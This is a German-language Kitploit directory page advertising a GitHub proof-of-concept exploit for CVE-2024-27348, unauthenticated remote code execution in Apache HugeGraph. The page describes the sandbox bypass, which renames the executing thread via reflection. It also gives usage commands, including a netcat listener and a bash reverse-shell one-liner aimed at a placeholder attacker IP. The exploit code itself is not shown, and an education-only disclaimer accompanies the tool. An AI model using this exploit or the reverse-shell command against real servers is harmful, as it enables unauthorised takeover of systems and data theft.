Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-27348-HugeGraph-RCE — Fortgeschrittener PoC-Exploit für CVE-2024-27348, der zuverlässige RCE in Apache HugeGraph über Sandbox-Bypass und nicht-blinde Befehlsausführung erreicht. | Kitploit
Tools/GitHubGitHub/akelaqe/cve-2024-27348-hugegraph-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubakelaqe/cve-2024-27348-hugegraph-rce

CVE-2024-27348-HugeGraph-RCE

Fortgeschrittener PoC-Exploit für CVE-2024-27348, der zuverlässige RCE in Apache HugeGraph über Sandbox-Bypass und nicht-blinde Befehlsausführung erreicht.

Repository anzeigen
12vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-27348: Apache HugeGraph RCE (Erweiterter Sandbox-Bypass)

Python 3.x Exploit CVE

Ein fortschrittlicher, hochzuverlässiger Proof-of-Concept-Exploit (PoC) für CVE-2024-27348 (Remote Code Execution in Apache HugeGraph Server).

Im Gegensatz zu vielen öffentlichen PoCs, die Befehle blind ausführen oder aufgrund der Einschränkungen von Java Runtime.exec() bei komplexen Payloads scheitern, ist dieses Skript auf Zuverlässigkeit in realen Penetrationstest-Szenarien ausgelegt.

⚠️ Haftungsausschluss

Nur für Bildungs- und autorisierte Testzwecke. Dieses Tool wird Sicherheitsforschern, Penetrationstestern und Systemadministratoren zur Verfügung gestellt, um die Schwachstelle in autorisierten Umgebungen zu verifizieren. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

✨ Funktionen & technische Verbesserungen

Dieser Exploit verbessert frühe öffentliche PoCs, indem er drei kritische Probleme adressiert:

  1. HugeSecurityManager-Sandbox-Bypass: Die HugeGraph-Sandbox blockiert die Ausführung, wenn der aufrufende Thread gremlin-server-exec-* oder task-worker-* heißt. Dieser Payload nutzt Java-Reflection, um den Ausführungsthread vor dem Auslösen des Payloads dynamisch in BypassThread umzubenennen und so den Security Manager nahtlos zu umgehen.
  2. Verarbeitung komplexer Payloads: Anstelle von Runtime.getRuntime().exec(String), das bei komplexen Bash-Befehlen (wie Reverse Shells) an Leerzeichen scheitert, verwendet dieser Exploit ProcessBuilder mit einer korrekt formatierten List<String>. Dies ermöglicht die sichere Ausführung komplexer Payloads mit Anführungszeichen und Umleitungen.
  3. Vollständiges Lesen der Ausgabe (Nicht-blinde RCE): Das Skript liest den InputStream des ausgeführten Prozesses mit einem Java-Scanner und gibt die tatsächliche Ausgabe des Befehls in der JSON-HTTP-Antwort zurück. Sie sehen genau das, was der Server sieht.

⚙️ Anforderungen

  • Python 3.x
  • requests-Bibliothek

Installieren Sie die erforderlichen Abhängigkeiten:

root@kitploit:~
pip3 install requests

🚀 Verwendung

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

Beispiele

  1. Basis-Befehlsausführung (Ausgabe lesen):
root@kitploit:~
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
  1. Erzeugen einer Reverse Shell: Da der Payload Leerzeichen und Anführungszeichen korrekt verarbeitet, können Sie eine standardmäßige Bash-Reverse-Shell direkt injizieren, ohne sie base64-codieren oder bereitstellen zu müssen:
root@kitploit:~
# On your attacker machine, start a listener:
nc -lvnp 4444

# Execute the exploit:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

🔍 Schwachstellendetails

Apache HugeGraph Server stellt einen Gremlin-API-Endpunkt (/gremlin) bereit, über den Benutzer Groovy-Skripte einreichen können. Aufgrund unzureichender Sandboxing in Versionen vor dem Patch kann ein nicht authentifizierter Angreifer über Java-Reflection beliebige Betriebssystembefehle ausführen.

Tool herunterladen